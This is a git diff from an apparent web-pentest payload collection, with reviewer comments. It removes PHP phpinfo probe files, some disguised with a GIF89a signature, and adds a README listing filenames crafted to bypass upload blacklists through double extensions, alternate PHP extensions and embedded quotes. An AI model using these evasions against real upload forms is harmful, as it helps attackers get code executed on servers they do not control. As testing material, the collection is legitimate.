Zipped PHPInfo files
BIN
Payloads/PHPInfo.zip
Normal file
|
@ -1,5 +0,0 @@
|
||||||
#!/bin/sh
|
|
||||||
zip phpinfo-aio.zip phpinfo*.{p*,txt,jp*g,gif}
|
|
||||||
|
|
||||||
tar -cvf phpinfo-aio.tar phpinfo*.{p*,txt,jp*g,gif}
|
|
||||||
|
|
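Review bot: make-aio.sh declares `#!/bin/sh`, but both the `zip` and the `tar` line depend on brace expansion (`phpinfo*.{p*,txt,jp*g,gif}`), which is a bash feature that a POSIX sh such as dash does not perform. There the pattern stays one literal glob and matches nothing. The README lists this script as shipped inside PHPInfo.zip, so either change the shebang to `#!/bin/bash` or spell out the four patterns (`phpinfo*.p* phpinfo*.txt phpinfo*.jp*g phpinfo*.gif`). Also check the patterns against the README file list: if a name such as `phpinfo."gif` is literal, it ends in none of `.p*`, `.txt`, `.jp*g` or `.gif`, so none of the four patterns would pick it up.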
Before Width: | Height: | Size: 7.2 KiB |
Before Width: | Height: | Size: 74 KiB |
|
@ -1,3 +0,0 @@
|
||||||
//tested on 7.2
|
|
||||||
// even with short_open_tag=0
|
|
||||||
<?=phpinfo()?>
|
|
|
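Review bot: the two `//` lines at the top of this file sit outside any PHP tag, so PHP emits them as literal text ahead of the phpinfo output instead of treating them as comments. Move the "tested on 7.2 / even with short_open_tag=0" remark inside the tag or into the README. Note as well that `<?=` echoes the return value of `phpinfo()`, so a stray `1` follows the page.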
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
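Review bot: `GIF89a1` on the first line is only a signature prefix, not a valid GIF header, since no logical screen descriptor follows it. This 29 B file therefore exercises a magic-byte check only, and anything that actually decodes the image will reject it. The README should say so, and should say how these variants differ from phpinfo-metadata.gif, because the same two lines recur unchanged in many hunks of this commit and nothing explains what each filename is meant to test.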
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1 +0,0 @@
|
||||||
GIF89a1
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 28 B |
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1,2 +0,0 @@
|
||||||
GIF89a1
|
|
||||||
<?php phpinfo(); ?>
|
|
Before Width: | Height: | Size: 29 B |
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -1 +0,0 @@
|
||||||
<?php phpinfo(); ?>
|
|
|
@ -44,4 +44,39 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali
|
||||||
|
|
||||||
## POC_img_phpinfo File
|
## POC_img_phpinfo File
|
||||||
|
|
||||||
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
|
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
|
||||||
|
|
||||||
|
|
||||||
|
## PHPInfo.zip
|
||||||
|
|
||||||
|
This zip file containes files with filenames for bypassing blacklists and accessing `phpinfo.php`:
|
||||||
|
|
||||||
|
- ` make-aio.sh`
|
||||||
|
- ` phpinfo-aio.tar`
|
||||||
|
- ` phpinfo-aio.zip`
|
||||||
|
- `'phpinfo.""gif'`
|
||||||
|
- `'phpinfo."gif'`
|
||||||
|
- `"phpinfo.''gif"`
|
||||||
|
- `"phpinfo.'gif"`
|
||||||
|
- ` phpinfo.jpg.php`
|
||||||
|
- ` phpinfo-metadata.gif`
|
||||||
|
- ` phpinfo-metadata.jpg`
|
||||||
|
- ` phpinfo.php`
|
||||||
|
- ` phpinfo.php-1.gif`
|
||||||
|
- ` phpinfo.php-2.gif`
|
||||||
|
- ` phpinfo.php3`
|
||||||
|
- ` phpinfo.php4`
|
||||||
|
- ` phpinfo.php5`
|
||||||
|
- ` phpinfo.php7`
|
||||||
|
- `'phpinfo.php.""gif'`
|
||||||
|
- `'phpinfo.php."gif'`
|
||||||
|
- `"phpinfo.php.''gif"`
|
||||||
|
- `"phpinfo.php.'gif"`
|
||||||
|
- ` phpinfo.phpt`
|
||||||
|
- `'phpinfo.php;.txt'`
|
||||||
|
- ` phpinfo.pht`
|
||||||
|
- ` phpinfo.phtml`
|
||||||
|
- ` phpinfo-shortsyntax.php`
|
||||||
|
- ` phpinfo.txt`
|
||||||
|
|
||||||
|
It's impossible to unzip this file on Windows, due to their arbitrary filename restrictions. It's possible to unzip it in WSL though.
|
||||||
|
|
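Review bot: the file list under "## PHPInfo.zip" reads like pasted `ls` output. Most entries carry a leading space inside the backticks and some are wrapped in shell quotes (`'phpinfo."gif'`, `"phpinfo.'gif"`), so a reader cannot tell which quote characters belong to the filename. List the literal names and state which characters are part of each. Smaller points in the same hunk: `containes` should be `contains`; make-aio.sh, phpinfo-aio.tar and phpinfo-aio.zip are build artifacts rather than bypass filenames and belong in a separate line; and "arbitrary filename restrictions" would be more useful if it named the cause, which is that Windows does not allow `"` in filenames.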